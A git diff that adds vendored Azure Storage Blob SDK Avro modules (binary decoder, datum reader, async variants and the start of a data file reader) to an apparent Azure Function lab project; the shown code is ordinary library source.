+# -------------------------------------------------------------------------- diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/avro/__pycache__/__init__.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/avro/__pycache__/__init__.cpython-39.pyc new file mode 100644 index 0000000..145badc Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/avro/__pycache__/__init__.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/avro/__pycache__/avro_io.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/avro/__pycache__/avro_io.cpython-39.pyc new file mode 100644 index 0000000..1bb991b Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/avro/__pycache__/avro_io.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/avro/__pycache__/avro_io_async.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/avro/__pycache__/avro_io_async.cpython-39.pyc new file mode 100644 index 0000000..cbec54a Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/avro/__pycache__/avro_io_async.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/avro/__pycache__/datafile.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/avro/__pycache__/datafile.cpython-39.pyc new file mode 100644 index 0000000..fb8696e Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/avro/__pycache__/datafile.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/avro/__pycache__/datafile_async.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/avro/__pycache__/datafile_async.cpython-39.pyc new file mode 100644 index 0000000..5aa881e Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/avro/__pycache__/datafile_async.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/avro/__pycache__/schema.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/avro/__pycache__/schema.cpython-39.pyc new file mode 100644 index 0000000..832219a Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/avro/__pycache__/schema.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/avro/avro_io.py 
b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/avro/avro_io.py
new file mode 100644
index 0000000..e79cd7b
--- /dev/null
+++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/avro/avro_io.py
@@ -0,0 +1,464 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+
+"""Input/output utilities.
+
+Includes:
+ - i/o-specific constants
+ - i/o-specific exceptions
+ - schema validation
+ - leaf value encoding and decoding
+ - datum reader/writer stuff (?)
+
+Also includes a generic representation for data, which uses the
+following mapping:
+ - Schema records are implemented as dict.
+ - Schema arrays are implemented as list.
+ - Schema maps are implemented as dict.
+ - Schema strings are implemented as unicode.
+ - Schema bytes are implemented as str.
+ - Schema ints are implemented as int.
+ - Schema longs are implemented as long.
+ - Schema floats are implemented as float.
+ - Schema doubles are implemented as float.
+ - Schema booleans are implemented as bool.
+"""
+
+import json
+import logging
+import struct
+import sys
+
+from ..avro import schema
+
+PY3 = sys.version_info[0] == 3
+
+logger = logging.getLogger(__name__)
+
+# ------------------------------------------------------------------------------
+# Constants
+
+STRUCT_FLOAT = struct.Struct('<f')  # little-endian float
+STRUCT_DOUBLE = struct.Struct('<d')  # little-endian double
+
+
+# ------------------------------------------------------------------------------
+# Exceptions
+
+
+class SchemaResolutionException(schema.AvroException):
+    def __init__(self, fail_msg, writer_schema=None):
+        pretty_writers = json.dumps(json.loads(str(writer_schema)), indent=2)
+        if writer_schema:
+            fail_msg += "\nWriter's Schema: %s" % pretty_writers
+        schema.AvroException.__init__(self, fail_msg)
+
+
+# ------------------------------------------------------------------------------
+# Decoder
+
+
+class BinaryDecoder(object):
+    """Read leaf values."""
+
+    def __init__(self, reader):
+        """
+        reader is a Python object on which we can call read, seek, and tell.
+        """
+        self._reader = reader
+
+    @property
+    def reader(self):
+        """Reports the reader used by this decoder."""
+        return self._reader
+
+    def read(self, n):
+        """Read n bytes.
+
+        Args:
+            n: Number of bytes to read.
+        Returns:
+            The next n bytes from the input.
+        """
+        assert (n >= 0), n
+        input_bytes = self.reader.read(n)
+        if n > 0 and not input_bytes:
+            raise StopIteration
+        assert (len(input_bytes) == n), input_bytes
+        return input_bytes
+
+    @staticmethod
+    def read_null():
+        """
+        null is written as zero bytes
+        """
+        return None
+
+    def read_boolean(self):
+        """
+        a boolean is written as a single byte
+        whose value is either 0 (false) or 1 (true).
+        """
+        b = ord(self.read(1))
+        if b == 1:
+            return True
+        if b == 0:
+            return False
+        fail_msg = "Invalid value for boolean: %s" % b
+        raise schema.AvroException(fail_msg)
+
+    def read_int(self):
+        """
+        int and long values are written using variable-length, zig-zag coding.
+        """
+        return self.read_long()
+
+    def read_long(self):
+        """
+        int and long values are written using variable-length, zig-zag coding.
+        """
+        b = ord(self.read(1))
+        n = b & 0x7F
+        shift = 7
+        while (b & 0x80) != 0:
+            b = ord(self.read(1))
+            n |= (b & 0x7F) << shift
+            shift += 7
+        datum = (n >> 1) ^ -(n & 1)
+        return datum
+
+    def read_float(self):
+        """
+        A float is written as 4 bytes.
+        The float is converted into a 32-bit integer using a method equivalent to
+        Java's floatToIntBits and then encoded in little-endian format.
+        """
+        return STRUCT_FLOAT.unpack(self.read(4))[0]
+
+    def read_double(self):
+        """
+        A double is written as 8 bytes.
+        The double is converted into a 64-bit integer using a method equivalent to
+        Java's doubleToLongBits and then encoded in little-endian format.
+        """
+        return STRUCT_DOUBLE.unpack(self.read(8))[0]
+
+    def read_bytes(self):
+        """
+        Bytes are encoded as a long followed by that many bytes of data.
+        """
+        nbytes = self.read_long()
+        assert (nbytes >= 0), nbytes
+        return self.read(nbytes)
+
+    def read_utf8(self):
+        """
+        A string is encoded as a long followed by
+        that many bytes of UTF-8 encoded character data.
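+
+        For example, the string "foo" is encoded as the zig-zag long 3
+        (a single byte, 0x06) followed by the three UTF-8 bytes 0x66 0x6F 0x6F.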
+ """ + input_bytes = self.read_bytes() + if PY3: + try: + return input_bytes.decode('utf-8') + except UnicodeDecodeError as exn: + logger.error('Invalid UTF-8 input bytes: %r', input_bytes) + raise exn + else: + # PY2 + return unicode(input_bytes, "utf-8") # pylint: disable=undefined-variable + + def skip_null(self): + pass + + def skip_boolean(self): + self.skip(1) + + def skip_int(self): + self.skip_long() + + def skip_long(self): + b = ord(self.read(1)) + while (b & 0x80) != 0: + b = ord(self.read(1)) + + def skip_float(self): + self.skip(4) + + def skip_double(self): + self.skip(8) + + def skip_bytes(self): + self.skip(self.read_long()) + + def skip_utf8(self): + self.skip_bytes() + + def skip(self, n): + self.reader.seek(self.reader.tell() + n) + + +# ------------------------------------------------------------------------------ +# DatumReader + + +class DatumReader(object): + """Deserialize Avro-encoded data into a Python data structure.""" + + def __init__(self, writer_schema=None): + """ + As defined in the Avro specification, we call the schema encoded + in the data the "writer's schema". + """ + self._writer_schema = writer_schema + + # read/write properties + def set_writer_schema(self, writer_schema): + self._writer_schema = writer_schema + + writer_schema = property(lambda self: self._writer_schema, + set_writer_schema) + + def read(self, decoder): + return self.read_data(self.writer_schema, decoder) + + def read_data(self, writer_schema, decoder): + # function dispatch for reading data based on type of writer's schema + if writer_schema.type == 'null': + result = decoder.read_null() + elif writer_schema.type == 'boolean': + result = decoder.read_boolean() + elif writer_schema.type == 'string': + result = decoder.read_utf8() + elif writer_schema.type == 'int': + result = decoder.read_int() + elif writer_schema.type == 'long': + result = decoder.read_long() + elif writer_schema.type == 'float': + result = decoder.read_float() + elif writer_schema.type == 'double': + result = decoder.read_double() + elif writer_schema.type == 'bytes': + result = decoder.read_bytes() + elif writer_schema.type == 'fixed': + result = self.read_fixed(writer_schema, decoder) + elif writer_schema.type == 'enum': + result = self.read_enum(writer_schema, decoder) + elif writer_schema.type == 'array': + result = self.read_array(writer_schema, decoder) + elif writer_schema.type == 'map': + result = self.read_map(writer_schema, decoder) + elif writer_schema.type in ['union', 'error_union']: + result = self.read_union(writer_schema, decoder) + elif writer_schema.type in ['record', 'error', 'request']: + result = self.read_record(writer_schema, decoder) + else: + fail_msg = "Cannot read unknown schema type: %s" % writer_schema.type + raise schema.AvroException(fail_msg) + return result + + def skip_data(self, writer_schema, decoder): + if writer_schema.type == 'null': + result = decoder.skip_null() + elif writer_schema.type == 'boolean': + result = decoder.skip_boolean() + elif writer_schema.type == 'string': + result = decoder.skip_utf8() + elif writer_schema.type == 'int': + result = decoder.skip_int() + elif writer_schema.type == 'long': + result = decoder.skip_long() + elif writer_schema.type == 'float': + result = decoder.skip_float() + elif writer_schema.type == 'double': + result = decoder.skip_double() + elif writer_schema.type == 'bytes': + result = decoder.skip_bytes() + elif writer_schema.type == 'fixed': + result = self.skip_fixed(writer_schema, decoder) + elif writer_schema.type == 'enum': + 
result = self.skip_enum(decoder)
+        elif writer_schema.type == 'array':
+            self.skip_array(writer_schema, decoder)
+            result = None
+        elif writer_schema.type == 'map':
+            self.skip_map(writer_schema, decoder)
+            result = None
+        elif writer_schema.type in ['union', 'error_union']:
+            result = self.skip_union(writer_schema, decoder)
+        elif writer_schema.type in ['record', 'error', 'request']:
+            self.skip_record(writer_schema, decoder)
+            result = None
+        else:
+            fail_msg = "Unknown schema type: %s" % writer_schema.type
+            raise schema.AvroException(fail_msg)
+        return result
+
+    @staticmethod
+    def read_fixed(writer_schema, decoder):
+        """
+        Fixed instances are encoded using the number of bytes declared
+        in the schema.
+        """
+        return decoder.read(writer_schema.size)
+
+    @staticmethod
+    def skip_fixed(writer_schema, decoder):
+        return decoder.skip(writer_schema.size)
+
+    @staticmethod
+    def read_enum(writer_schema, decoder):
+        """
+        An enum is encoded by an int, representing the zero-based position
+        of the symbol in the schema.
+        """
+        # read data
+        index_of_symbol = decoder.read_int()
+        if index_of_symbol >= len(writer_schema.symbols):
+            fail_msg = "Can't access enum index %d for enum with %d symbols" \
+                       % (index_of_symbol, len(writer_schema.symbols))
+            raise SchemaResolutionException(fail_msg, writer_schema)
+        read_symbol = writer_schema.symbols[index_of_symbol]
+        return read_symbol
+
+    @staticmethod
+    def skip_enum(decoder):
+        return decoder.skip_int()
+
+    def read_array(self, writer_schema, decoder):
+        """
+        Arrays are encoded as a series of blocks.
+
+        Each block consists of a long count value,
+        followed by that many array items.
+        A block with count zero indicates the end of the array.
+        Each item is encoded per the array's item schema.
+
+        If a block's count is negative,
+        then the count is followed immediately by a long block size,
+        indicating the number of bytes in the block.
+        The actual count in this case
+        is the absolute value of the count written.
+        """
+        read_items = []
+        block_count = decoder.read_long()
+        while block_count != 0:
+            if block_count < 0:
+                block_count = -block_count
+                decoder.read_long()
+            for _ in range(block_count):
+                read_items.append(self.read_data(writer_schema.items, decoder))
+            block_count = decoder.read_long()
+        return read_items
+
+    def skip_array(self, writer_schema, decoder):
+        block_count = decoder.read_long()
+        while block_count != 0:
+            if block_count < 0:
+                block_size = decoder.read_long()
+                decoder.skip(block_size)
+            else:
+                for _ in range(block_count):
+                    self.skip_data(writer_schema.items, decoder)
+            block_count = decoder.read_long()
+
+    def read_map(self, writer_schema, decoder):
+        """
+        Maps are encoded as a series of blocks.
+
+        Each block consists of a long count value,
+        followed by that many key/value pairs.
+        A block with count zero indicates the end of the map.
+        Each item is encoded per the map's value schema.
+
+        If a block's count is negative,
+        then the count is followed immediately by a long block size,
+        indicating the number of bytes in the block.
+        The actual count in this case
+        is the absolute value of the count written.
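+
+        For example, a map holding the single entry {"a": v} is typically
+        written as the block count 1 (byte 0x02), the encoded key "a", the
+        encoded value v, and a terminating block count of 0 (byte 0x00).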
+ """ + read_items = {} + block_count = decoder.read_long() + while block_count != 0: + if block_count < 0: + block_count = -block_count + decoder.read_long() + for _ in range(block_count): + key = decoder.read_utf8() + read_items[key] = self.read_data(writer_schema.values, decoder) + block_count = decoder.read_long() + return read_items + + def skip_map(self, writer_schema, decoder): + block_count = decoder.read_long() + while block_count != 0: + if block_count < 0: + block_size = decoder.read_long() + decoder.skip(block_size) + else: + for _ in range(block_count): + decoder.skip_utf8() + self.skip_data(writer_schema.values, decoder) + block_count = decoder.read_long() + + def read_union(self, writer_schema, decoder): + """ + A union is encoded by first writing a long value indicating + the zero-based position within the union of the schema of its value. + The value is then encoded per the indicated schema within the union. + """ + # schema resolution + index_of_schema = int(decoder.read_long()) + if index_of_schema >= len(writer_schema.schemas): + fail_msg = "Can't access branch index %d for union with %d branches" \ + % (index_of_schema, len(writer_schema.schemas)) + raise SchemaResolutionException(fail_msg, writer_schema) + selected_writer_schema = writer_schema.schemas[index_of_schema] + + # read data + return self.read_data(selected_writer_schema, decoder) + + def skip_union(self, writer_schema, decoder): + index_of_schema = int(decoder.read_long()) + if index_of_schema >= len(writer_schema.schemas): + fail_msg = "Can't access branch index %d for union with %d branches" \ + % (index_of_schema, len(writer_schema.schemas)) + raise SchemaResolutionException(fail_msg, writer_schema) + return self.skip_data(writer_schema.schemas[index_of_schema], decoder) + + def read_record(self, writer_schema, decoder): + """ + A record is encoded by encoding the values of its fields + in the order that they are declared. In other words, a record + is encoded as just the concatenation of the encodings of its fields. + Field values are encoded per their schema. + + Schema Resolution: + * the ordering of fields may be different: fields are matched by name. + * schemas for fields with the same name in both records are resolved + recursively. + * if the writer's record contains a field with a name not present in the + reader's record, the writer's value for that field is ignored. + * if the reader's record schema has a field that contains a default value, + and writer's schema does not have a field with the same name, then the + reader should use the default value from its field. + * if the reader's record schema has a field with no default value, and + writer's schema does not have a field with the same name, then the + field's value is unset. 
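+
+        For example, a record {"name": "x", "age": 7} whose fields are declared
+        in that order is written simply as the encoding of "x" followed by the
+        encoding of 7; no field names or delimiters appear on the wire.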
+ """ + # schema resolution + read_record = {} + for field in writer_schema.fields: + field_val = self.read_data(field.type, decoder) + read_record[field.name] = field_val + return read_record + + def skip_record(self, writer_schema, decoder): + for field in writer_schema.fields: + self.skip_data(field.type, decoder) + + +# ------------------------------------------------------------------------------ + +if __name__ == '__main__': + raise Exception('Not a standalone module') diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/avro/avro_io_async.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/avro/avro_io_async.py new file mode 100644 index 0000000..f0b3eae --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/avro/avro_io_async.py @@ -0,0 +1,448 @@ +# ------------------------------------------------------------------------- +# Copyright (c) Microsoft Corporation. All rights reserved. +# Licensed under the MIT License. See License.txt in the project root for +# license information. +# -------------------------------------------------------------------------- + +"""Input/output utilities. + +Includes: + - i/o-specific constants + - i/o-specific exceptions + - schema validation + - leaf value encoding and decoding + - datum reader/writer stuff (?) + +Also includes a generic representation for data, which uses the +following mapping: + - Schema records are implemented as dict. + - Schema arrays are implemented as list. + - Schema maps are implemented as dict. + - Schema strings are implemented as unicode. + - Schema bytes are implemented as str. + - Schema ints are implemented as int. + - Schema longs are implemented as long. + - Schema floats are implemented as float. + - Schema doubles are implemented as float. + - Schema booleans are implemented as bool. +""" + +import logging +import sys + +from ..avro import schema + +from .avro_io import STRUCT_FLOAT, STRUCT_DOUBLE, SchemaResolutionException + +PY3 = sys.version_info[0] == 3 + +logger = logging.getLogger(__name__) + +# ------------------------------------------------------------------------------ +# Decoder + + +class AsyncBinaryDecoder(object): + """Read leaf values.""" + + def __init__(self, reader): + """ + reader is a Python object on which we can call read, seek, and tell. + """ + self._reader = reader + + @property + def reader(self): + """Reports the reader used by this decoder.""" + return self._reader + + async def read(self, n): + """Read n bytes. + + Args: + n: Number of bytes to read. + Returns: + The next n bytes from the input. + """ + assert (n >= 0), n + input_bytes = await self.reader.read(n) + if n > 0 and not input_bytes: + raise StopAsyncIteration + assert (len(input_bytes) == n), input_bytes + return input_bytes + + @staticmethod + def read_null(): + """ + null is written as zero bytes + """ + return None + + async def read_boolean(self): + """ + a boolean is written as a single byte + whose value is either 0 (false) or 1 (true). + """ + b = ord(await self.read(1)) + if b == 1: + return True + if b == 0: + return False + fail_msg = "Invalid value for boolean: %s" % b + raise schema.AvroException(fail_msg) + + async def read_int(self): + """ + int and long values are written using variable-length, zig-zag coding. 
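+
+        For example, 0 is encoded as 0x00, -1 as 0x01, 1 as 0x02,
+        -2 as 0x03, and 2 as 0x04.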
+ """ + return await self.read_long() + + async def read_long(self): + """ + int and long values are written using variable-length, zig-zag coding. + """ + b = ord(await self.read(1)) + n = b & 0x7F + shift = 7 + while (b & 0x80) != 0: + b = ord(await self.read(1)) + n |= (b & 0x7F) << shift + shift += 7 + datum = (n >> 1) ^ -(n & 1) + return datum + + async def read_float(self): + """ + A float is written as 4 bytes. + The float is converted into a 32-bit integer using a method equivalent to + Java's floatToIntBits and then encoded in little-endian format. + """ + return STRUCT_FLOAT.unpack(await self.read(4))[0] + + async def read_double(self): + """ + A double is written as 8 bytes. + The double is converted into a 64-bit integer using a method equivalent to + Java's doubleToLongBits and then encoded in little-endian format. + """ + return STRUCT_DOUBLE.unpack(await self.read(8))[0] + + async def read_bytes(self): + """ + Bytes are encoded as a long followed by that many bytes of data. + """ + nbytes = await self.read_long() + assert (nbytes >= 0), nbytes + return await self.read(nbytes) + + async def read_utf8(self): + """ + A string is encoded as a long followed by + that many bytes of UTF-8 encoded character data. + """ + input_bytes = await self.read_bytes() + if PY3: + try: + return input_bytes.decode('utf-8') + except UnicodeDecodeError as exn: + logger.error('Invalid UTF-8 input bytes: %r', input_bytes) + raise exn + else: + # PY2 + return unicode(input_bytes, "utf-8") # pylint: disable=undefined-variable + + def skip_null(self): + pass + + async def skip_boolean(self): + await self.skip(1) + + async def skip_int(self): + await self.skip_long() + + async def skip_long(self): + b = ord(await self.read(1)) + while (b & 0x80) != 0: + b = ord(await self.read(1)) + + async def skip_float(self): + await self.skip(4) + + async def skip_double(self): + await self.skip(8) + + async def skip_bytes(self): + await self.skip(await self.read_long()) + + async def skip_utf8(self): + await self.skip_bytes() + + async def skip(self, n): + await self.reader.seek(await self.reader.tell() + n) + + +# ------------------------------------------------------------------------------ +# DatumReader + + +class AsyncDatumReader(object): + """Deserialize Avro-encoded data into a Python data structure.""" + + def __init__(self, writer_schema=None): + """ + As defined in the Avro specification, we call the schema encoded + in the data the "writer's schema", and the schema expected by the + reader the "reader's schema". 
+ """ + self._writer_schema = writer_schema + + # read/write properties + def set_writer_schema(self, writer_schema): + self._writer_schema = writer_schema + + writer_schema = property(lambda self: self._writer_schema, + set_writer_schema) + + async def read(self, decoder): + return await self.read_data(self.writer_schema, decoder) + + async def read_data(self, writer_schema, decoder): + # function dispatch for reading data based on type of writer's schema + if writer_schema.type == 'null': + result = decoder.read_null() + elif writer_schema.type == 'boolean': + result = await decoder.read_boolean() + elif writer_schema.type == 'string': + result = await decoder.read_utf8() + elif writer_schema.type == 'int': + result = await decoder.read_int() + elif writer_schema.type == 'long': + result = await decoder.read_long() + elif writer_schema.type == 'float': + result = await decoder.read_float() + elif writer_schema.type == 'double': + result = await decoder.read_double() + elif writer_schema.type == 'bytes': + result = await decoder.read_bytes() + elif writer_schema.type == 'fixed': + result = await self.read_fixed(writer_schema, decoder) + elif writer_schema.type == 'enum': + result = await self.read_enum(writer_schema, decoder) + elif writer_schema.type == 'array': + result = await self.read_array(writer_schema, decoder) + elif writer_schema.type == 'map': + result = await self.read_map(writer_schema, decoder) + elif writer_schema.type in ['union', 'error_union']: + result = await self.read_union(writer_schema, decoder) + elif writer_schema.type in ['record', 'error', 'request']: + result = await self.read_record(writer_schema, decoder) + else: + fail_msg = "Cannot read unknown schema type: %s" % writer_schema.type + raise schema.AvroException(fail_msg) + return result + + async def skip_data(self, writer_schema, decoder): + if writer_schema.type == 'null': + result = decoder.skip_null() + elif writer_schema.type == 'boolean': + result = await decoder.skip_boolean() + elif writer_schema.type == 'string': + result = await decoder.skip_utf8() + elif writer_schema.type == 'int': + result = await decoder.skip_int() + elif writer_schema.type == 'long': + result = await decoder.skip_long() + elif writer_schema.type == 'float': + result = await decoder.skip_float() + elif writer_schema.type == 'double': + result = await decoder.skip_double() + elif writer_schema.type == 'bytes': + result = await decoder.skip_bytes() + elif writer_schema.type == 'fixed': + result = await self.skip_fixed(writer_schema, decoder) + elif writer_schema.type == 'enum': + result = await self.skip_enum(decoder) + elif writer_schema.type == 'array': + await self.skip_array(writer_schema, decoder) + result = None + elif writer_schema.type == 'map': + await self.skip_map(writer_schema, decoder) + result = None + elif writer_schema.type in ['union', 'error_union']: + result = await self.skip_union(writer_schema, decoder) + elif writer_schema.type in ['record', 'error', 'request']: + await self.skip_record(writer_schema, decoder) + result = None + else: + fail_msg = "Unknown schema type: %s" % writer_schema.type + raise schema.AvroException(fail_msg) + return result + + @staticmethod + async def read_fixed(writer_schema, decoder): + """ + Fixed instances are encoded using the number of bytes declared + in the schema. 
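+
+        For example, a fixed type declared with "size": 16 always occupies
+        exactly 16 bytes on the wire, with no length prefix.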
+        """
+        return await decoder.read(writer_schema.size)
+
+    @staticmethod
+    async def skip_fixed(writer_schema, decoder):
+        return await decoder.skip(writer_schema.size)
+
+    @staticmethod
+    async def read_enum(writer_schema, decoder):
+        """
+        An enum is encoded by an int, representing the zero-based position
+        of the symbol in the schema.
+        """
+        # read data
+        index_of_symbol = await decoder.read_int()
+        if index_of_symbol >= len(writer_schema.symbols):
+            fail_msg = "Can't access enum index %d for enum with %d symbols" \
+                       % (index_of_symbol, len(writer_schema.symbols))
+            raise SchemaResolutionException(fail_msg, writer_schema)
+        read_symbol = writer_schema.symbols[index_of_symbol]
+        return read_symbol
+
+    @staticmethod
+    async def skip_enum(decoder):
+        return await decoder.skip_int()
+
+    async def read_array(self, writer_schema, decoder):
+        """
+        Arrays are encoded as a series of blocks.
+
+        Each block consists of a long count value,
+        followed by that many array items.
+        A block with count zero indicates the end of the array.
+        Each item is encoded per the array's item schema.
+
+        If a block's count is negative,
+        then the count is followed immediately by a long block size,
+        indicating the number of bytes in the block.
+        The actual count in this case
+        is the absolute value of the count written.
+        """
+        read_items = []
+        block_count = await decoder.read_long()
+        while block_count != 0:
+            if block_count < 0:
+                block_count = -block_count
+                await decoder.read_long()
+            for _ in range(block_count):
+                read_items.append(await self.read_data(writer_schema.items, decoder))
+            block_count = await decoder.read_long()
+        return read_items
+
+    async def skip_array(self, writer_schema, decoder):
+        block_count = await decoder.read_long()
+        while block_count != 0:
+            if block_count < 0:
+                block_size = await decoder.read_long()
+                await decoder.skip(block_size)
+            else:
+                for _ in range(block_count):
+                    await self.skip_data(writer_schema.items, decoder)
+            block_count = await decoder.read_long()
+
+    async def read_map(self, writer_schema, decoder):
+        """
+        Maps are encoded as a series of blocks.
+
+        Each block consists of a long count value,
+        followed by that many key/value pairs.
+        A block with count zero indicates the end of the map.
+        Each item is encoded per the map's value schema.
+
+        If a block's count is negative,
+        then the count is followed immediately by a long block size,
+        indicating the number of bytes in the block.
+        The actual count in this case
+        is the absolute value of the count written.
+        """
+        read_items = {}
+        block_count = await decoder.read_long()
+        while block_count != 0:
+            if block_count < 0:
+                block_count = -block_count
+                await decoder.read_long()
+            for _ in range(block_count):
+                key = await decoder.read_utf8()
+                read_items[key] = await self.read_data(writer_schema.values, decoder)
+            block_count = await decoder.read_long()
+        return read_items
+
+    async def skip_map(self, writer_schema, decoder):
+        block_count = await decoder.read_long()
+        while block_count != 0:
+            if block_count < 0:
+                block_size = await decoder.read_long()
+                await decoder.skip(block_size)
+            else:
+                for _ in range(block_count):
+                    await decoder.skip_utf8()
+                    await self.skip_data(writer_schema.values, decoder)
+            block_count = await decoder.read_long()
+
+    async def read_union(self, writer_schema, decoder):
+        """
+        A union is encoded by first writing a long value indicating
+        the zero-based position within the union of the schema of its value.
+        The value is then encoded per the indicated schema within the union.
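+
+        For example, against the union schema ["null", "string"], the string
+        "a" is encoded as the long 1 (selecting "string", written as byte 0x02)
+        followed by the encoded string itself; a null is just the long 0.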
+ """ + # schema resolution + index_of_schema = int(await decoder.read_long()) + if index_of_schema >= len(writer_schema.schemas): + fail_msg = "Can't access branch index %d for union with %d branches" \ + % (index_of_schema, len(writer_schema.schemas)) + raise SchemaResolutionException(fail_msg, writer_schema) + selected_writer_schema = writer_schema.schemas[index_of_schema] + + # read data + return await self.read_data(selected_writer_schema, decoder) + + async def skip_union(self, writer_schema, decoder): + index_of_schema = int(await decoder.read_long()) + if index_of_schema >= len(writer_schema.schemas): + fail_msg = "Can't access branch index %d for union with %d branches" \ + % (index_of_schema, len(writer_schema.schemas)) + raise SchemaResolutionException(fail_msg, writer_schema) + return await self.skip_data(writer_schema.schemas[index_of_schema], decoder) + + async def read_record(self, writer_schema, decoder): + """ + A record is encoded by encoding the values of its fields + in the order that they are declared. In other words, a record + is encoded as just the concatenation of the encodings of its fields. + Field values are encoded per their schema. + + Schema Resolution: + * the ordering of fields may be different: fields are matched by name. + * schemas for fields with the same name in both records are resolved + recursively. + * if the writer's record contains a field with a name not present in the + reader's record, the writer's value for that field is ignored. + * if the reader's record schema has a field that contains a default value, + and writer's schema does not have a field with the same name, then the + reader should use the default value from its field. + * if the reader's record schema has a field with no default value, and + writer's schema does not have a field with the same name, then the + field's value is unset. + """ + # schema resolution + read_record = {} + for field in writer_schema.fields: + field_val = await self.read_data(field.type, decoder) + read_record[field.name] = field_val + return read_record + + async def skip_record(self, writer_schema, decoder): + for field in writer_schema.fields: + await self.skip_data(field.type, decoder) + + +# ------------------------------------------------------------------------------ + +if __name__ == '__main__': + raise Exception('Not a standalone module') diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/avro/datafile.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/avro/datafile.py new file mode 100644 index 0000000..c27f79a --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/avro/datafile.py @@ -0,0 +1,266 @@ +# ------------------------------------------------------------------------- +# Copyright (c) Microsoft Corporation. All rights reserved. +# Licensed under the MIT License. See License.txt in the project root for +# license information. 
+# -------------------------------------------------------------------------- + +"""Read/Write Avro File Object Containers.""" + +import io +import logging +import sys +import zlib + +from ..avro import avro_io +from ..avro import schema + +PY3 = sys.version_info[0] == 3 + +logger = logging.getLogger(__name__) + +# ------------------------------------------------------------------------------ +# Constants + +# Version of the container file: +VERSION = 1 + +if PY3: + MAGIC = b'Obj' + bytes([VERSION]) + MAGIC_SIZE = len(MAGIC) +else: + MAGIC = 'Obj' + chr(VERSION) + MAGIC_SIZE = len(MAGIC) + +# Size of the synchronization marker, in number of bytes: +SYNC_SIZE = 16 + +# Schema of the container header: +META_SCHEMA = schema.parse(""" +{ + "type": "record", "name": "org.apache.avro.file.Header", + "fields": [{ + "name": "magic", + "type": {"type": "fixed", "name": "magic", "size": %(magic_size)d} + }, { + "name": "meta", + "type": {"type": "map", "values": "bytes"} + }, { + "name": "sync", + "type": {"type": "fixed", "name": "sync", "size": %(sync_size)d} + }] +} +""" % { + 'magic_size': MAGIC_SIZE, + 'sync_size': SYNC_SIZE, +}) + +# Codecs supported by container files: +VALID_CODECS = frozenset(['null', 'deflate']) + +# Metadata key associated to the schema: +SCHEMA_KEY = "avro.schema" + + +# ------------------------------------------------------------------------------ +# Exceptions + + +class DataFileException(schema.AvroException): + """Problem reading or writing file object containers.""" + +# ------------------------------------------------------------------------------ + + +class DataFileReader(object): # pylint: disable=too-many-instance-attributes + """Read files written by DataFileWriter.""" + + def __init__(self, reader, datum_reader, **kwargs): + """Initializes a new data file reader. + + Args: + reader: Open file to read from. + datum_reader: Avro datum reader. + """ + self._reader = reader + self._raw_decoder = avro_io.BinaryDecoder(reader) + self._header_reader = kwargs.pop('header_reader', None) + self._header_decoder = None if self._header_reader is None else avro_io.BinaryDecoder(self._header_reader) + self._datum_decoder = None # Maybe reset at every block. + self._datum_reader = datum_reader + + # In case self._reader only has partial content(without header). + # seek(0, 0) to make sure read the (partial)content from beginning. + self._reader.seek(0, 0) + + # read the header: magic, meta, sync + self._read_header() + + # ensure codec is valid + avro_codec_raw = self.get_meta('avro.codec') + if avro_codec_raw is None: + self.codec = "null" + else: + self.codec = avro_codec_raw.decode('utf-8') + if self.codec not in VALID_CODECS: + raise DataFileException('Unknown codec: %s.' % self.codec) + + # get ready to read + self._block_count = 0 + + # object_position is to support reading from current position in the future read, + # no need to downloading from the beginning of avro. + if hasattr(self._reader, 'object_position'): + self.reader.track_object_position() + + self._cur_object_index = 0 + # header_reader indicates reader only has partial content. The reader doesn't have block header, + # so we read use the block count stored last time. + # Also ChangeFeed only has codec==null, so use _raw_decoder is good. 
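+        # (When only partial content is present there is no block header to
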